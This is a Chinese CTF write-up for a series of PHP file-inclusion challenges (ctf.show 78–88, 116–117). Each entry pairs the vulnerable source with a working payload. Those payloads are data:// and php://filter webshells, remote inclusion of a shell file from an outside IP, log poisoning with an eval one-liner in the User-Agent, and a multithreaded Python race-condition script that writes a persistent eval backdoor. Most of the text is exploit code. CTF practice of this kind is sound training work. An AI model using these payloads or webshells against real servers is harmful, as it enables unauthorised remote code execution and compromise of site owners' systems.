78
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
}else{
highlight_file(__FILE__);
}
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgKiIpOyA/Pg==
?file=pHp://FilTer/convert.base64-encode/resource=flag.php
79
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgKiIpOyA/Pg==
80
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
?file=http://49.232.213.200/shell.txt
POST:cmd=system("tac *");
//日志包含
?file=/var/log/nginx/access.log //查看到日志格式,發現UA可控
//UA寫入一句話木馬
User-Agent: <?php eval($_POST[a]); ?>
或 <?=eval($_POST[a]); ?>
//注意包含后並不會講一句話木馬打印出來,因為PHP被解析,此處eval前沒有加@忽略錯誤,所有會有警告或報錯
//include含有一句話木馬的log
?file=/var/log/nginx/access.log
a=system("tac f*");
81
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
日志包含,同上
82
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
相比上一題過濾了 . 無法再使用日志包含,需要包含無后綴的文件
//無數次失敗
import io,threading,requests
url = 'http://67363ea2-74cc-40df-81c3-3447bff4cd9b.challenge.ctf.show/'
sessionid = 'test'
data = {
'1':"file_put_contents('/var/www/html/2.php','<?php eval($_POST[2]);?>');"
# 一句話木馬寫到/var/www/html/2.php
}
def write(session):
fileBytes = io.BytesIO(b'a'*1024*50)
while True:
response = session.post(url,
data={
'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[1]);?>'
},
cookies = {
'PHPSESSID':sessionid
},
files = {
'file':('test.jpg',fileBytes)
})
# print(response.text)
def read(session):
while True:
response = session.post(url+'?file=/tmp/sess_'+sessionid,data=data,
cookies = {
'PHPSESSID':sessionid
} )
response2 = session.get(url+'2.php')
if response2.status_code == 200:
print("+++++++++++done+++++++++++")
exit(0)
else:
print(response2.status_code)
if __name__ == '__main__':
event = threading.Event()
with requests.session() as session:
for i in range(2):
threading.Thread(target=write,args=(session,)).start()
for i in range(3):
threading.Thread(target=read, args=(session,)).start()
event.set()
以下幾題(83~86)均可用本題腳本,因為多線程,就算有刪除指令,會有進程將數據緊接着寫進去
83
Warning: session_destroy(): Trying to destroy uninitialized session in /var/www/html/index.php on line 14
<?php
session_unset();
session_destroy();
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
84
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
system("rm -rf /tmp/*");
include($file);
}else{
highlight_file(__FILE__);
}
85
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
if(file_exists($file)){
$content = file_get_contents($file);
if(strpos($content, "<")>0){
die("error");
}
include($file);
}
}else{
highlight_file(__FILE__);
}
86
<?php
define('還要秀?', dirname(__FILE__));
set_include_path(還要秀?);
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
87
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$content = $_POST['content'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
file_put_contents(urldecode($file), "<?php die('大佬別秀了');?>".$content);
}else{
highlight_file(__FILE__);
}
?file=php://filter/write=string.rot13/resource=1.php #url編碼兩次
POST:<?php eval($_POST[1]);?> #ROT13編碼一次
//1.php為一句話木馬文件
88
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
die("error");
}
include($file);
}else{
highlight_file(__FILE__);
}
?file=data://text/plain;base64,PD9waHAgIHN5c3RlbSgidGFjICoiKTs/PmFh
#<?php system("tac *");?>aa
116
//打開是一個視頻,把視頻下載下來,分解出一張圖片,是文件包含的源碼。
<?php
function filter($x){
if(preg_match(' /http|https|data|input|rot13|base64|string|log|sess/i ' ,$x)){
die( 'too young too simple sometimes native!');
}
}
$file=isset($_GET['file']?$_GET['file']:"sp2.mp4");
header('Content-Type: video/mp4');
filter($file);
echo file_get_contents($file);
?>
117
<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($x){
if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
die('too young too simple sometimes naive!');
}
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);
payload: file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php post:contents=?<hp pvela$(P_SO[T]1;)>?